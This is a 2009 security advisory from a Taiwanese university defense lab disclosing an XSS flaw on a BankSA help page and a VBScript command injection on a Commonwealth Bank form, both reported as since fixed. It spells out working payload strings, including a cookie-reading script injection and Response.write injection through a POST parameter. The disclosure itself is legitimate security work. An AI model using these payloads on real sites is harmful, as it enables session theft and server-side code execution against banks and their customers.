Australian Bank Cross Site Scripting

`==============================================  
Security Advisory: Banks in Australia  
  
militan (Chia-Jun Lin)  
[email protected]  
adl.csie.ncu.edu.tw/~militan <http://adl.csie.ncu.edu.tw/%7Emilitan>  
militan-c7.blogspot.com  
Advanced Defense Lab(ADL), NCU CSIE TAIWAN  
12th May, 2009  
==============================================  
  
  
I. VULNERABILITY  
-------------------------  
XSS  
Command Injection  
  
Banks below are vulnerable:  
BankSA. www.banksa.com.au  
Commonwealth Bank. www.commbank.com.au  
etc...  
  
II. DESCRIPTION  
-------------------------  
Some banks contain vulnerabilities in certain pages, which may be misused by  
attackers. Via the command injection, attackers can execute any vbscript  
command on the hosts.  
  
Generally, the security mechanism of the websites of banks in AU are  
implemented indeed. However, their complex architectures are unnecessary  
actually. Due to the large architectures, some pages do not perform the  
validation properly.  
  
  
III. Detail & POC  
------------------------  
1. BankSA: XSS. Javascript Injection.  
webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS  
The BBO function means "Business banking online", and the vulnerable  
variable is "origin".  
  
If origin=CBS, the page will immediately redirect to the link below.  
www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS  
  
Nevertheless, if origin=CBS" then the page would redirect inappropriately.  
****javascript code generated in the intermediate page  
function focusWin()  
{  
window.focus();  
//var theUrl = window.location.pathname;  
//var pos = theUrl.indexOf("help.asp");  
//theUrl = theUrl.substr(0,pos);  
window.location.href = "  
http://www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS  
"";  
//document.write("  
http://www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS  
"");  
}  
window.onload = focusWin;  
****  
  
Exploit:  
webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS  
";%0a%0aalert(document.cookie);//  
webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS  
";}</script>%0a%0a<script>alert("Vulnerable")</script>  
POC:  
http://adl.csie.ncu.edu.tw/~militan/banksa1.jpg<http://adl.csie.ncu.edu.tw/%7Emilitan/banksa1.jpg>  
http://adl.csie.ncu.edu.tw/~militan/banksa2.jpg<http://adl.csie.ncu.edu.tw/%7Emilitan/banksa2.jpg>  
http://adl.csie.ncu.edu.tw/~militan/banksa3.jpg<http://adl.csie.ncu.edu.tw/%7Emilitan/banksa3.jpg>  
  
  
2. Commonwealth Bank: ASP command injection (server-side vbscript injection)  
The commbank provides lots of tools to calculate, or to evaluate the  
financial plan.  
This page would collect personal information and make an appointment.  
www.commbank.com.au/retirement/_PRODUCTION/content/ffthinkabout.asp  
However, almost all the parameters are manipulated in vbscript on server.  
  
Moreover, the page will return the error message when you mangle the  
parameters. Thus attackers can craft the exploit easily, and then arbitrary  
vbscript commands can be executed on server.  
  
Exploit:  
post parameter: Whattodo (default: FillForm)  
FillForm & Response.write("ccccc")'  
FillForm & Response.write("ccccc") %0d%0a Response.write("kerker") '  
POC:  
http://adl.csie.ncu.edu.tw/~militan/commbank1.jpg<http://adl.csie.ncu.edu.tw/%7Emilitan/commbank1.jpg>  
http://adl.csie.ncu.edu.tw/~militan/commbank2.jpg<http://adl.csie.ncu.edu.tw/%7Emilitan/commbank2.jpg>  
<http://adl.csie.ncu.edu.tw/%7Emilitan/commbank3.jpg>  
http://adl.csie.ncu.edu.tw/~militan/commbank4.jpg<http://adl.csie.ncu.edu.tw/%7Emilitan/commbank4.jpg>  
  
  
IV. SOLUTION& CONCLUSION  
-------------------------  
Most banks in AU should reduce the enormous architecture of their website*:*  
do not provide additional functions or make sure that these functions are  
secure.  
  
The vulnerabilities have been fixed already.  
  
  
regards  
--  
militan  
Advanced Defense Lab, NCU Taiwan  
`